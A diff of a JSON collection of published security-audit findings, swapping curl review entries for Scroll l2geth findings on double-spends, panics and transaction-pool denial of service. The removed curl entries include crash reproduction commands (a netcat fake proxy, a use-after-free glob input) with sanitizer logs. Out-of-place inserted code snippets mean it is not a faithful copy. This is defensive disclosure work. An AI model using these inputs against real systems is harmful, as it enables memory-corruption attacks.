bar=\"\" for domain localhost, path /, expire 0 < Set-Cookie: foo bar= * no chunk, no close, no size. Assume close to signal end Figure 5.2: Sending a cookie with name foo\\tbar , and no value. % cat /tmp/cookies.txt | tail - localhost FALSE / FALSE 0 foo bar Figure 5.3: The resulting entry in the saved cookie file Recommendations Short term, either reject any cookie with a tab in its key (as \\t is not a valid character for cookie keys, according to the relevant RFC), or escape or quote tab characters that appear in cookie keys. Long term, do not assume that external data will follow the intended specification. Always account for the presence of special characters in such inputs.", + "title": "3. Risk of double-spend attacks due to use of single-node Clique consensus without finality API ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geth uses the proof-of-authority Clique consensus protocol, defined by EIP-225. This consensus type is not designed for single-node networks, and an attacker-controlled sequencer node may produce multiple conflicting forks of the chain to facilitate double-spend attacks. The severity of this finding is compounded by the fact that there is no API for an end user to determine whether their transaction has been finalized by L1, forcing L2 users to use ineffective block/time delays to determine finality. Clique consensus was originally designed as a replacement for proof-of-work consensus for Ethereum testnets. It uses the same fork choice rule as Ethereum's proof-of-work consensus; the fork with the highest difficulty should be considered the canonical fork. 
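Stepping back briefly to the non-constant-time comparison finding above: the recommended constant-time check is a one-liner in Python's standard library. hmac.compare_digest scans both inputs in full regardless of where they first differ, so response timing leaks nothing about the secret:

import hmac

def credentials_match(supplied: str, stored: str) -> bool:
    return hmac.compare_digest(supplied.encode(), stored.encode())

print(credentials_match("hunter2", "hunter2"))  # True, in time independent of any prefix match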
Clique consensus does not use proof-of-work and cannot update block difficulty using the traditional calculation; instead, block difficulty may be one of two values: 2 if the block was mined by the designated signer for the block height, or 1 if the block was mined by a non-designated signer for the block height. This means that in a network with only one authorized signer, all of the blocks and forks produced by the sequencer will have the same difficulty value, making it impossible for syncing nodes to determine which fork is canonical at the given block height. In a normal proof-of-work network, one of the proposed blocks will have a higher difficulty value, causing syncing nodes to re-organize and drop the block with the lower difficulty value. In a single-validator proof-of-authority network, neither block will be preferred, so each syncing node will simply prefer the first block they received. This finding is not unique to l2geth; it will be endemic to all L2 systems that have only one authorized sequencer. Exploit Scenario An attacker acquires control over l2geth's centralized sequencer node. The attacker modifies the node to prove two forks: one fork containing a deposit transaction to a centralized exchange, and one fork with no such deposit transaction. The attacker publishes the first fork, and the centralized exchange picks up and processes the deposit transaction. The attacker continues to produce blocks on the second private fork. Once the exchange processes the deposit, the attacker stops generating blocks on the public fork, generates an extra block to make the private fork longer than the public fork, then publishes the private fork to cause a re-organization across syncing nodes. This attack must be completed before the sequencer is required to publish a proof to L1. Recommendations Short term, add API methods and documentation to ensure that bridges and centralized exchanges query only for transactions that have been proved and finalized on the L1 network. Long term, decentralize the sequencer in such a way that a majority of sequencers must collude in order to successfully execute a double-spend attack. This design should be accompanied by a slashing mechanism to penalize sequencers that sign conflicting blocks.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -1500,9 +1500,9 @@ ] }, { - "title": "6. Standard output/input/error may not be opened ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "The function main_checkfds() is used to ensure that file descriptors 0, 1, and 2 (stdin, stdout, and stderr) are open before curl starts to run. This is necessary to avoid the case wherein, if one of those descriptors fails to open initially, the next network socket opened by cURL may gain an FD number of 0, 1, or 2, resulting in what should be local input/output being received from or sent to a network socket instead. However, pipe errors actually result in the same outcome as success: static void main_checkfds ( void ) { #ifdef HAVE_PIPE int fd[ 2 ] = { STDIN_FILENO, STDIN_FILENO }; while (fd[ 0 ] == STDIN_FILENO || fd[ 0 ] == STDOUT_FILENO || fd[ 0 ] == STDERR_FILENO || fd[ 1 ] == STDIN_FILENO || fd[ 1 ] == STDOUT_FILENO || fd[ 1 ] == STDERR_FILENO) if (pipe(fd) < 0 ) return ; /* Out of handles. This isn't really a big problem now, but will be when we try to create a socket later. 
*/ close(fd[ 0 ]); close(fd[ 1 ]); #endif } Figure 6.1: tool_main.c, lines 83 through 105 Though the comment notes that an out-of-handles condition would result in a failure later on in the application, there may be cases where this is not true; e.g., the maximum number of handles has been reached at the time of this check, but handles are closed between it and the next attempt to create a socket. In such a case, execution might continue as normal, with stdin/out/err being redirected to an unexpected location. Recommendations Short term, use fcntl() to check if stdin/out/err are open. If they are not, exit the program if the pipe function fails. Long term, do not assume that execution will fail later; fail early in cases like these.", + "title": "4. Improper use of panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geth overuses Go's panic mechanism in lieu of Go's built-in error propagation system, introducing opportunities for denial of service. Go has two primary methods through which errors can be reported or propagated up the call stack: the panic method and Go errors. The use of panic is not recommended, as it is unrecoverable: when an operation panics, the Go program is terminated and must be restarted. The use of panic creates a denial-of-service vector that is especially applicable to a centralized sequencer, as a restart of the sequencer would effectively halt the L2 network until the sequencer recovers. Some example uses of panic are presented in figures 4.1 to 4.3. These do not represent an exhaustive list of panic statements in the codebase, and the Scroll team should investigate each use of panic in its modified code to verify whether it truly represents an unrecoverable error. func sanityCheckByte32Key(b []byte) { if len(b) != 32 && len(b) != 20 { panic(fmt.Errorf(\"do not support length except for 120bit and 256bit now. data: %v len: %v\", b, len(b))) } } Figure 4.1: The sanityCheckByte32Key function panics when a trie key does not match the expected size. This function may be called during the execution of certain RPC requests. (go-ethereum/trie/zk_trie.go#44-48) func (s *StateAccount) MarshalFields() ([]zkt.Byte32, uint32) { fields := make([]zkt.Byte32, 5) if s.Balance == nil { panic(\"StateAccount balance nil\") } if !utils.CheckBigIntInField(s.Balance) { panic(\"StateAccount balance overflow\") } if !utils.CheckBigIntInField(s.Root.Big()) { panic(\"StateAccount root overflow\") } if !utils.CheckBigIntInField(new(big.Int).SetBytes(s.PoseidonCodeHash)) { panic(\"StateAccount poseidonCodeHash overflow\") } Figure 4.2: The MarshalFields function panics when attempting to marshal an object that does not match certain requirements. This function may be called during the execution of certain RPC requests. (go-ethereum/core/types/state_account_marshalling.go#47-64) func (t *ProofTracer) MarkDeletion(key []byte) { if path, existed := t.emptyTermPaths[string(key)]; existed { // copy empty node terminated path for final scanning t.rawPaths[string(key)] = path } else if path, existed = t.rawPaths[string(key)]; existed { // sanity check leafNode := path[len(path)-1] if leafNode.Type != zktrie.NodeTypeLeaf { panic(\"all path recorded in proofTrace should be ended with leafNode\") } Figure 4.3: The MarkDeletion function panics when the proof tracer contains a path that does not terminate in a leaf node. 
Exploit Scenario An attacker identifies an error path that terminates with a panic that can be triggered by a malformed RPC request or proof payload. The attacker leverages this issue to either disrupt the sequencer's operation or prevent follower/syncing nodes from operating properly. Recommendations Short term, review all uses of panic that have been introduced by Scroll's changes to go-ethereum. Ensure that these uses of panic truly represent unrecoverable errors, and if not, add error handling logic to recover from the errors. Long term, annotate all valid uses of panic with explanations for why the errors are unrecoverable and, if applicable, how to prevent the unrecoverable conditions from being triggered. l2geth's code review process must also be updated to verify that this documentation exists for new uses of panic that are introduced later.", "labels": [ "Trail of Bits", "Severity: Low", @@ -1510,29 +1510,19 @@ ] }, { - "title": "7. Double free when using HTTP proxy with specific protocols ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Using cURL with a proxy connection and the dict, gopher, LDAP, or telnet protocol triggers a double free vulnerability (figure 7.1). The connect_init function allocates a memory block for a connectdata struct (figure 7.2). After the connection, cURL frees the allocated buffer in the conn_free function (figure 7.3); the buffer is then freed a second time in Curl_free_request_state, which uses the Curl_safefree function on elements of the Curl_easy struct (figure 7.4). This double free was also not detected in release builds during our testing; the glibc allocator's checks may fail to detect such cases on some occasions. The success of the two frees indicates that future memory allocations made by the program will return the same pointer twice. This may enable exploitation of cURL if the allocated objects contain data controlled by an attacker. Additionally, if this vulnerability also triggers in libcurl (which we believe it should), it may enable the exploitation of programs that depend on libcurl. 
$ nc -l 1337 | echo 'test' & # Imitation of a proxy server using netcat $ curl -x http://test:test@127.0.0.1:1337 dict://127.0.0.1 2069694==ERROR: AddressSanitizer: attempting double-free on 0x617000000780 in thread T0: #0 0x494c8d in free (curl/src/.libs/curl+0x494c8d) #1 0x7f1eeeaf3afe in Curl_free_request_state curl/lib/url.c:2259:3 #2 0x7f1eeeaf3afe in Curl_close curl/lib/url.c:421:3 #3 0x7f1eeea30943 in curl_easy_cleanup curl/lib/easy.c:798:3 #4 0x4e07df in post_per_transfer curl/src/tool_operate.c:656:3 #5 0x4dee58 in serial_transfers curl/src/tool_operate.c:2434:18 #6 0x4dee58 in run_all_transfers curl/src/tool_operate.c:2620:16 #7 0x4dee58 in operate curl/src/tool_operate.c:2732:18 #8 0x4dcf73 in main curl/src/tool_main.c:276:14 #9 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #10 0x41c7cd in _start (curl/src/.libs/curl+0x41c7cd) 0x617000000780 is located 0 bytes inside of 664-byte region [0x617000000780,0x617000000a18) freed by thread T0 here: #0 0x494c8d in free (curl/src/.libs/curl+0x494c8d) #1 0x7f1eeeaf6094 in conn_free curl/lib/url.c:814:3 #2 0x7f1eeea92cc6 in curl_multi_perform curl/lib/multi.c:2684: #3 0x7f1eeea304bd in easy_transfer curl/lib/easy.c:662:15 #4 0x7f1eeea304bd in easy_perform curl/lib/easy.c:752:42 #5 0x7f1eeea304bd in curl_easy_perform curl/lib/easy.c:771:10 #6 0x4dee35 in serial_transfers curl/src/tool_operate.c:2432:16 #7 0x4dee35 in run_all_transfers curl/src/tool_operate.c:2620:16 #8 0x4dee35 in operate curl/src/tool_operate.c:2732:18 #9 0x4dcf73 in main curl/src/tool_main.c:276:14 #10 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x495082 in calloc (curl/src/.libs/curl+0x495082) #1 0x7f1eeea6d642 in connect_init curl/lib/http_proxy.c:174:9 #2 0x7f1eeea6d642 in Curl_proxyCONNECT curl/lib/http_proxy.c:1061:14 #3 0x7f1eeea6d1f2 in Curl_proxy_connect curl/lib/http_proxy.c:118:14 #4 0x7f1eeea94c33 in multi_runsingle curl/lib/multi.c:2028:16 #5 0x7f1eeea92cc6 in curl_multi_perform curl/lib/multi.c:2684:14 #6 0x7f1eeea304bd in easy_transfer curl/lib/easy.c:662:15 #7 0x7f1eeea304bd in easy_perform curl/lib/easy.c:752:42 #8 0x7f1eeea304bd in curl_easy_perform curl/lib/easy.c:771:10 #9 0x4dee35 in serial_transfers curl/src/tool_operate.c:2432:16 #10 0x4dee35 in run_all_transfers curl/src/tool_operate.c:2620:16 #11 0x4dee35 in operate curl/src/tool_operate.c:2732:18 #12 0x4dcf73 in main curl/src/tool_main.c:276:14 #13 0x7f1eee2af082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: double-free (curl/src/.libs/curl+0x494c8d) in free Figure 7.1: Reproducing double free vulnerability with ASAN log 158 static CURLcode connect_init ( struct Curl_easy *data, bool reinit) // (...) 174 s = calloc( 1 , sizeof ( struct http_connect_state )); Figure 7.2: Allocating a block of memory that is freed twice ( curl/lib/http_proxy.c#158174 ) 787 static void conn_free ( struct connectdata *conn) // (...) 
814 Curl_safefree(conn->connect_state); Figure 7.3: The conn_free function that frees the http_connect_state struct for HTTP CONNECT ( curl/lib/url.c#787-814 ) 2257 void Curl_free_request_state ( struct Curl_easy *data) 2258 { 2259 Curl_safefree(data->req.p.http); 2260 Curl_safefree(data->req.newurl); Figure 7.4: The Curl_free_request_state function that frees elements in the Curl_easy struct, which leads to a double free vulnerability ( curl/lib/url.c#2257-2260 ) Exploit Scenario An attacker finds a way to exploit the double free vulnerability described in this finding, either in cURL or in a program that uses libcurl, and gets remote code execution on the machine from which the cURL code was executed. Recommendations Short term, fix the double free vulnerability described in this finding. Long term, expand cURL's unit tests and fuzz tests to cover different types of proxies for supported protocols. Also, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the approach presented in the argv-fuzz-inl.h from the AFL++ project. This will force the fuzzer to build an argv pointer array (which points to arguments passed to cURL) from NULL-delimited standard input. Finally, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or on cURL's manual.", "labels": [ "Trail of Bits", "Severity: Medium", "Difficulty: Low" ] }, { - "title": "8. Some flags override previous instances of themselves ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Some cURL flags, when provided multiple times, override themselves, effectively using only the last flag provided. If a flag makes a cURL invocation's security options more strict, then accidental overwriting may weaken the desired security. The identified flag with this property is the --crlfile command-line option. It allows users to pass a PEM-formatted certificate revocation list to cURL. --crlfile (TLS) Provide a file using PEM format with a Certificate Revocation List that may specify peer certificates that are to be considered revoked. If this option is used several times, the last one will be used. Example: curl --crlfile rejects.txt https://example.com Added in 7.19.7. Figure 8.1: The description of the --crlfile option Exploit Scenario A user wishes for cURL to reject certificates specified across multiple certificate revocation lists. He unwittingly uses the --crlfile flag multiple times, dropping all but the last-specified list. Requests the user sends with cURL are intercepted by a Man-in-the-Middle attacker, who uses a known-compromised certificate to bypass TLS protections. Recommendations Short term, change the behavior of --crlfile to append new certificates to the revocation list, not to replace those specified earlier. If backwards compatibility prevents this, have cURL issue a warning such as --crlfile specified multiple times, using only ... Long term, ensure that behavior, such as how multiple instances of a command-line argument are handled, is consistent throughout the application. Issue a warning when a security-relevant flag is provided multiple times.", + "title": "5. 
Risk of panic from nil dereference due to flawed error reporting in addressToKey ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "The addressToKey function, shown in figure 5.1, returns a nil pointer instead of a Go error when an error is returned by the preImage.Hash() function, which will cause a nil dereference panic in the NewZkTrieProofWriter function, as shown in figure 5.2. If the error generated by preImage.Hash() is unrecoverable, the addressToKey function should panic instead of silently returning a nil pointer. func addressToKey(addr common.Address) *zkt.Hash { var preImage zkt.Byte32 copy(preImage[:], addr.Bytes()) h, err := preImage.Hash() if err != nil { log.Error(\"hash failure\", \"preImage\", hexutil.Encode(preImage[:])) return nil } return zkt.NewHashFromBigInt(h) } Figure 5.1: The addressToKey function returns a nil pointer to zkt.Hash when an error is returned by preImage.Hash(). (go-ethereum/trie/zkproof/writer.go#31-41) func NewZkTrieProofWriter(storage *types.StorageTrace) (*zktrieProofWriter, error) { underlayerDb := memorydb.New() zkDb := trie.NewZktrieDatabase(underlayerDb) accounts := make(map[common.Address]*types.StateAccount) // resuming proof bytes to underlayerDb for addrs, proof := range storage.Proofs { if n := resumeProofs(proof, underlayerDb); n != nil { addr := common.HexToAddress(addrs) if n.Type == zktrie.NodeTypeEmpty { accounts[addr] = nil } else if acc, err := types.UnmarshalStateAccount(n.Data()); err == nil { if bytes.Equal(n.NodeKey[:], addressToKey(addr)[:]) { accounts[addr] = acc Figure 5.2: The addressToKey function is consumed by NewZkTrieProofWriter, which will attempt to dereference the nil pointer and generate a system panic. (go-ethereum/trie/zkproof/writer.go#152-167) Recommendations Short term, modify addressToKey so that it either returns an error that its calling functions can propagate or, if the error is unrecoverable, panics instead of returning a nil pointer. Long term, update Scroll's code review and style guidelines to reflect that errors must be propagated by Go's error system or must halt the program by using panic.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "9. Cookies are not stripped after redirect ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "If cookies are passed to cURL via the --cookie flag, they will not be stripped if the target responds with a redirect. RFC 9110 section 15.4, Redirection 3xx, does not specify whether or not cookies should be stripped during a redirect; as such, it may be better to err on the side of caution and strip them by default if the origin changed. The recommended behavior would match the current behavior with the cookie jar (i.e., when a server sets a new cookie and requests a redirect) and the Authorization header (which is stripped on cross-origin redirects). Recommendations Short term, if backwards compatibility would not prohibit such a change, strip cookies upon a redirect to a different origin by default and provide a command-line flag that enables the previous behavior (or extend the --location-trusted flag). Long term, in cases where a specification is ambiguous and practicality allows, always default to the most secure possible interpretation. Extend tests to check the behavior of passing data after redirection.", + "title": "6. 
Risk of transaction pool admission denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geth's changes to the transaction pool include an ECDSA recovery operation at the beginning of the pool's transaction validation logic, introducing a denial-of-service vector: an attacker could generate invalid transactions to exhaust the sequencer's resources. l2geth adds an L1 fee that all L2 transactions must pay. To verify that an L2 transaction can afford the L1 fee, the transaction pool calls fees.VerifyFee(), as shown in figure 6.1. VerifyFee() performs an ECDSA recovery operation to determine the account that will pay the L1 fee, as shown in figure 6.2. ECDSA key recovery is an expensive operation that should be executed as late in the transaction validation process as possible in order to reduce the impact of denial-of-service attacks. func (pool *TxPool) add(tx *types.Transaction, local bool) (replaced bool, err error) { // If the transaction is already known, discard it hash := tx.Hash() if pool.all.Get(hash) != nil { log.Trace(\"Discarding already known transaction\", \"hash\", hash) knownTxMeter.Mark(1) return false, ErrAlreadyKnown } // Make the local flag. If it's from local source or it's from the network but // the sender is marked as local previously, treat it as the local transaction. isLocal := local || pool.locals.containsTx(tx) if pool.chainconfig.Scroll.FeeVaultEnabled() { if err := fees.VerifyFee(pool.signer, tx, pool.currentState); err != nil { Figure 6.1: TxPool.add() calls fees.VerifyFee() before any other transaction validators are called. (go-ethereum/core/tx_pool.go#684-697) func VerifyFee(signer types.Signer, tx *types.Transaction, state StateDB) error { from, err := types.Sender(signer, tx) if err != nil { return errors.New(\"invalid transaction: invalid sender\") } Figure 6.2: VerifyFee() initiates an ECDSA recovery operation via types.Sender(). (go-ethereum/rollup/fees/rollup_fee.go#198-202) Exploit Scenario An attacker generates a denial-of-service attack against the sequencer by submitting extraordinarily large transactions. Because ECDSA recovery is a CPU-intensive operation and is executed before the transaction size is checked, the attacker is able to exhaust the memory resources of the sequencer. Recommendations Short term, modify the code to check for L1 fees in the TxPool.validateTx() function immediately after that function calls types.Sender(). This will ensure that other, less expensive-to-check validations are performed before the ECDSA signature is recovered. Long term, exercise caution when making changes to code paths that validate information received from public sources or gossip. For changes to the transaction pool, a good general rule of thumb is to validate transaction criteria in the following order: 1. Simple, in-memory criteria that do not require disk reads or data manipulation 2. Criteria that require simple, in-memory manipulations of the data, such as checks of the transaction size 3. Criteria that require an in-memory state trie to be checked 4. ECDSA recovery operations 5. 
Criteria that require an on-disk state trie to be checked However, note that sometimes these criteria must be checked out of order; for example, the ECDSA recovery operation to identify the origin account may need to be performed before the state trie is checked to determine whether the account can afford the transaction.", "labels": [ "Trail of Bits", "Severity: Low", @@ -1540,29 +1530,29 @@ ] }, { - "title": "10. Use after free while using parallel option and sequences ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Using cURL with the parallel option ( -Z ), two consecutive sequences (that end up creating 51 hosts), and an unmatched bracket triggers a use-after-free vulnerability (figure 10.1). The add_parallel_transfers function allocates memory blocks for an error buffer; consequently, by default, it allows up to 50 transfers (figure 10.2, line 2228). Then, in the Curl_failf function, it copies errors (e.g., Could not resolve host: q{ ) to the appropriate error buffers when connections fail (figure 10.3) and frees the memory. For the last sequence ( u~ host), it allocates a memory buffer (figure 10.2), frees a buffer (figure 10.3), and copies an error ( Could not resolve host: u~ ) to the previously freed memory buffer (figure 10.4). $ curl 0 -Z [q-u][u-~] } curl: (7) Failed to connect to 0.0.0.0 port 80 after 0 ms: Connection refused curl: (3) unmatched close brace/bracket in URL position 1: } ^ curl: (6) Could not resolve host: q{ curl: (6) Could not resolve host: q| curl: (6) Could not resolve host: q} curl: (6) Could not resolve host: q~ curl: (6) Could not resolve host: r{ curl: (6) Could not resolve host: r| curl: (6) Could not resolve host: r} curl: (6) Could not resolve host: r~ curl: (6) Could not resolve host: s{ curl: (6) Could not resolve host: s| curl: (6) Could not resolve host: s} curl: (6) Could not resolve host: s~ curl: (6) Could not resolve host: t{ curl: (6) Could not resolve host: t| curl: (6) Could not resolve host: t} curl: (6) Could not resolve host: t~ curl: (6) Could not resolve host: u{ curl: (6) Could not resolve host: u| curl: (6) Could not resolve host: u} curl: (3) unmatched close brace/bracket in URL position 1: } ^ ==2789144==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000004780 at pc 0x7f9b5f94016d bp 0x7fff12d4dbc0 sp 0x7fff12d4d368 WRITE of size #0 0x7f9b5f94016c in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors.cc:431 #1 0x7f9b5f7ce6f4 in strcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:90 #2 0x7f9b5f7ce6f4 in Curl_failf /home/scooby/curl/lib/sendf.c:275 #3 0x7f9b5f78309a in Curl_resolver_error /home/scooby/curl/lib/hostip.c:1316 #4 0x7f9b5f73cb6f in Curl_resolver_is_resolved /home/scooby/curl/lib/asyn-thread.c:596 #5 0x7f9b5f7bc77c in multi_runsingle /home/scooby/curl/lib/multi.c:1979 #6 0x7f9b5f7bf00f in curl_multi_perform /home/scooby/curl/lib/multi.c:2684 #7 0x55d812f7609e in parallel_transfers /home/scooby/curl/src/tool_operate.c:2308 #8 0x55d812f7609e in run_all_transfers /home/scooby/curl/src/tool_operate.c:2618 #9 0x55d812f7609e in operate /home/scooby/curl/src/tool_operate.c:2732 #10 0x55d812f4ffa8 in main /home/scooby/curl/src/tool_main.c:276 #11 0x7f9b5f1aa082 in __libc_start_main ../csu/libc-start.c:308
#12 0x55d812f506cd in _start (/usr/local/bin/curl+0x316cd) 0x611000004780 is located 0 bytes inside of 256-byte region [0x611000004780,0x611000004880) freed by thread T0 here: #0 0x7f9b5f9b140f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 #1 0x55d812f75682 in add_parallel_transfers /home/scooby/curl/src/tool_operate.c:2251 previously allocated by thread T0 here: #0 0x7f9b5f9b1808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x55d812f75589 in add_parallel_transfers /home/scooby/curl/src/tool_operate.c:2228 SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/asan/asan_interceptors.cc:431 in __interceptor_strcpy Shadow bytes around the buggy address: 0x0c227fff88a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c227fff88d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88e0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa =>0x0c227fff88f0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8900: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8910: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c227fff8920: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8930: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c227fff8940: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Heap left redzone: fa Freed heap region: fd ==2789144==ABORTING Figure 10.1: Reproducing use-after-free vulnerability with ASAN log 2192 static CURLcode add_parallel_transfers ( struct GlobalConfig *global, CURLM *multi, CURLSH *share, bool *morep, bool *addedp) 2197 { // (...) 2210 for (per = transfers; per && (all_added < global->parallel_max); per = per->next) { // (...) 2227 if (!errorbuf) { 2228 errorbuf = malloc(CURL_ERROR_SIZE); // (...) 2249 result = create_transfer(global, share, &getadded); 2250 if (result) { 2251 free(errorbuf); 2252 return result; 2253 } Figure 10.2: The add_parallel_transfers function ( curl/src/tool_operate.c#2192-2253 ) 264 void Curl_failf ( struct Curl_easy *data, const char *fmt, ...) 265 { // (...) 275 strcpy(data->set.errorbuffer, error); Figure 10.3: The Curl_failf function that copies the appropriate error to the error buffer ( curl/lib/sendf.c#264-275 ) Exploit Scenario An administrator sets up a service that calls cURL, where some of the cURL command-line arguments are provided from external, untrusted input. An attacker manipulates the input to exploit the use-after-free bug and run arbitrary code on the machine that runs cURL. Recommendations Short term, fix the use-after-free vulnerability described in this finding. Long term, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the argv-fuzz-inl.h from the AFL++ project to build argv from stdin in cURL. Also, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or cURL's manual.", + "title": "1. Transaction pool fails to drop transactions that cannot afford L1 fees ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geth defines two fees that must be paid for L2 transactions: an L2 fee and an L1 fee. However, the code fails to account for L1 fees; as a result, transactions that cannot afford the combined L1 and L2 fees may be included in a block rather than demoted, as intended.
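Concretely, the balance a sender must hold covers gas * gasPrice + value plus the L1 data fee. A sketch of the combined requirement (l1DataFee is a stand-in for whatever fee calculation l2geth consults, assumed here for illustration only):

package main

import (
	"fmt"
	"math/big"
)

// What "affording both fees" means for an L2 transaction, per the
// finding: the sender must cover gas * gasPrice + value + the L1 data
// fee. The last term is the one Cost() omits.
func totalCost(gas uint64, gasPrice, value, l1DataFee *big.Int) *big.Int {
	total := new(big.Int).Mul(gasPrice, new(big.Int).SetUint64(gas))
	total.Add(total, value)
	total.Add(total, l1DataFee) // the term Cost() omits
	return total
}

func main() {
	cost := totalCost(21000, big.NewInt(2), big.NewInt(1_000_000), big.NewInt(5_000))
	fmt.Println(cost) // 1047000; Cost() would report only 1042000
}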
The transaction.go file defines a Cost() function that returns the amount of ether that a transaction consumes, as shown in figure 1.1. The current implementation of Cost() does not account for L1 fees, causing other parts of the codebase to misjudge the balance requirements to execute a transaction. The correct implementation of Cost() should match the implementation of VerifyFee(), which correctly checks for L1 fees. // Cost returns gas * gasPrice + value. func (tx *Transaction) Cost() *big.Int { total := new(big.Int).Mul(tx.GasPrice(), new(big.Int).SetUint64(tx.Gas())) total.Add(total, tx.Value()) return total } Figure 1.1: The Cost() function does not include L1 fees in its calculation. (go-ethereum/core/types/transaction.go#318-323) Most notably, Cost() is consumed by the tx_list.Filter() function, which is used to prune un-executable transactions (transactions that cannot afford the fees), as shown in figure 1.2. The failure to account for L1 fees in Cost() could cause tx_list.Filter() to fail to demote such transactions, causing them to be incorrectly included in the block. func (l *txList) Filter(costLimit *big.Int, gasLimit uint64) (types.Transactions, types.Transactions) { // If all transactions are below the threshold, short circuit if l.costcap.Cmp(costLimit) <= 0 && l.gascap <= gasLimit { return nil, nil } l.costcap = new(big.Int).Set(costLimit) // Lower the caps to the thresholds l.gascap = gasLimit // Filter out all the transactions above the account's funds removed := l.txs.Filter(func(tx *types.Transaction) bool { return tx.Gas() > gasLimit || tx.Cost().Cmp(costLimit) > 0 }) Figure 1.2: Filter() uses Cost() to determine which transactions to demote. (go-ethereum/core/tx_list.go#332-343) Exploit Scenario A user creates an L2 transaction that can just barely afford the L1 and L2 fees in the next upcoming block. Their transaction is delayed due to full blocks and is included in a future block in which the L1 fees have risen. Their transaction reverts due to the increased L1 fees instead of being ejected from the transaction pool. Recommendations Short term, refactor the Cost() function to account for L1 fees, as is done in the VerifyFee() function; alternatively, have the transaction list structure use VerifyFee() or a similar function instead of Cost(). Long term, add additional tests to verify complex state transitions, such as a transaction becoming un-executable due to changes in L1 fees.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "11. Unused memory blocks are not freed resulting in memory leaks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "For specific commands (figures 11.1, 11.2, 11.3), cURL allocates blocks of memory that are not freed when they are no longer needed, leading to memory leaks. $ curl 0 -Z 0 -Tz 0 curl: Can't open 'z'! 
curl: try 'curl --help' or 'curl --manual' for more information curl: (26) Failed to open/read local data from file/application ================================================================= ==2798000==ERROR: LeakSanitizer: detected memory leaks Direct leak of 4848 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eba06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153 #1 0x561bb1d1dc9f in glob_url /home/scooby/curl/src/tool_urlglob.c:459 Indirect leak of 8 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1e06c in glob_fixed /home/scooby/curl/src/tool_urlglob.c:48 #2 0x561bb1d1e06c in glob_parse /home/scooby/curl/src/tool_urlglob.c:411 #3 0x561bb1d1e06c in glob_url /home/scooby/curl/src/tool_urlglob.c:467 Indirect leak of 2 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1e0b0 in glob_fixed /home/scooby/curl/src/tool_urlglob.c:53 #2 0x561bb1d1e0b0 in glob_parse /home/scooby/curl/src/tool_urlglob.c:411 #3 0x561bb1d1e0b0 in glob_url /home/scooby/curl/src/tool_urlglob.c:467 Indirect leak of 2 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1dc6a in glob_url /home/scooby/curl/src/tool_urlglob.c:454 Figure 11.1: Reproducing memory leaks in the tool_urlglob.c file, with LeakSanitizer log $ curl 00 --cu 00 curl: (7) Failed to connect to 0.0.0.0 port 80 after 0 ms: Connection refused ================================================================= 